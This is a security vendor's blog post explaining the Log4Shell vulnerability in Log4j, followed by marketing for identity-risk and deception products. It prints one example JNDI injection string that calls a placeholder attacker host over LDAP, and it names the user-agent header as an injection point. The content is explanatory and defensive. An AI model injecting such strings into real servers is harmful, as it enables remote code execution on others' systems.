Illusive Blog December 20, 2021

Log4j Vulnerability – An Important Reminder to “Assume Breach”

By Yan Linkov
Identity Risk Management, Log4j, Zero Trust

Mark Jaffe contributed to this blog post

As organizations rush to react to the Log4j vulnerability, attackers are already exploiting it. Unfortunately, history would suggest that organizations will be patching Log4j for many months (or years) to come. The good news is that organizations that have embraced the guiding principles of Zero Trust security, such as “assume breach,” will be prepared to minimize the impact of these attacks with solutions such as those from Illusive.

A High-Level Overview of the Log4j Vulnerability

The Log4j vulnerability (CVE-2021-44228 or “Log4Shell”) enables remote code execution because of a feature called message lookup substitution, which enables the substitution of strings to a different value at runtime. According to its documentation, “The JavaLookup allows Java environment information to be retrieved in convenient preformatted strings using the java: prefix.”

Log4j message example

An example of how Log4j message lookup substitution can retrieve strings (Left: Disabled vs Right: Enabled)

Specifically, JNDI lookup is problematic because it allows code retrieval from a remote server. JNDI provides a way for the programmer to lookup objects using different services and protocols, such as LDAP, as well as DNS, Java Remote Method Invocation (RMI), and others. Under certain conditions, when a JNDI lookup string is logged by Log4j it can cause the execution of malicious Java code stored on a remote server operated by a threat actor.

Here is an example of how a malicious string could appear:

${jndi:ldap://badGuy[.]com/object}

Web servers are an obvious target for these attacks because they tend to log a lot of user-based input, such as the “user-agent” HTTP header. These headers can be modified by attackers to inject malicious strings directly onto vulnerable servers.

Ransomware groups are already exploiting the Log4j vulnerability in their attacks, but research has shown that it takes organizations an average of 205 days to patch critical cyber security vulnerabilities – that is more than six months! Organizations cannot afford to ignore the Log4j vulnerability, but it seems like many will remain vulnerable through most of 2022. Pragmatically, organizations need to prepare to be attacked.

Zero Trust – Assume Breach

“Assume breach” is a guiding principle of Zero Trust security, a strategic approach to security that has become incredibly popular among security professionals during the past few years for its ability to secure complex hybrid environments (i.e. any user, any device, anywhere). For an organization to assume breach, it must minimize privilege escalation and lateral movement, as attackers are assumed to be able to gain a foothold into their environment.

Preventing Privilege Escalation and Lateral Movement

Once an attacker establishes a beachhead (e.g., on a web server), they seek out vulnerable privileged identities to establish persistence, escalate their privileges and move laterally across the network. Organizations can mitigate this risk with strong cyber hygiene to sanitize their identity attack surface.

Threat actors can leverage privileged identities to install malicious code, change security policies, steal data, and so forth – basically privileged identities enable attackers to do whatever they want. The problem is that organizations are harboring far more vulnerable identities than they realize; these risks include Shadow Admins, hard-coded credentials, and cached credentials, just to name a few.

Illusive’s Identity Risk Management capabilities enable security teams to obtain visibility into all of these risks, and more, across their entire organization, and automates their remediation. Once an organization’s identity attack surface is cleaned, Illusive’s Attack Detection System further baits attackers into revealing themselves with deceptive credentials and services that trigger an alert when they are used.

A common Log4j vulnerability exploitation flow

In the case of Log4j attacks, Illusive could deploy deceptive web servers to trick attackers. Even if an attacker is already inside your network, Illusive generates alerts for interactions with vulnerable web servers – Illusive is already detecting any attempts to exploit Log4j, as well as any other interactions with our deceptive web servers.

Additionally, by analyzing forensic evidence, Illusive enables organizations to determine if the exploitation attempt was related to the Log4j vulnerability. Incident response teams can search for malicious strings in multiple formats or they can download the pcap file to view the entire network traffic involved with the alert.

Illusive Malicious String Screenshot

One example of how Illusive could identify the malicious string

Know the Unknown – Identity Risk Assessment

Vulnerabilities, such as this most recent one with Log4j, will continue to be regularly found and exploited. Overwhelmed with large numbers of software vulnerabilities, Security and IT teams have found themselves forced to operate in a highly reactive and ineffective mode. It only makes sense to assume breach.

The first step organizations should take when they assume breach is to uncover and sanitize their existing identity risks. Illusive discovers these risks in 100% of the Identity Risk Assessments it conducts – at a rate of one-in-six endpoints. The sheer volume of privileged identity risks suggests that every organization is vulnerable to lateral attacks.

Illusive’s Identity Risk Management solution enables organizations to continuously discover vulnerable privileged identities, automatically mitigate these risks, and protect them with compensating controls, such as deception-based detection.

How can you prevent identity risks that you don’t know exist? Are you certain that you don’t have any vulnerable identities? Illusive is helping organizations illuminate these security gaps with a complimentary Identity Risk Assessment. Contact Illusive today to request your free Identity Risk Assessment.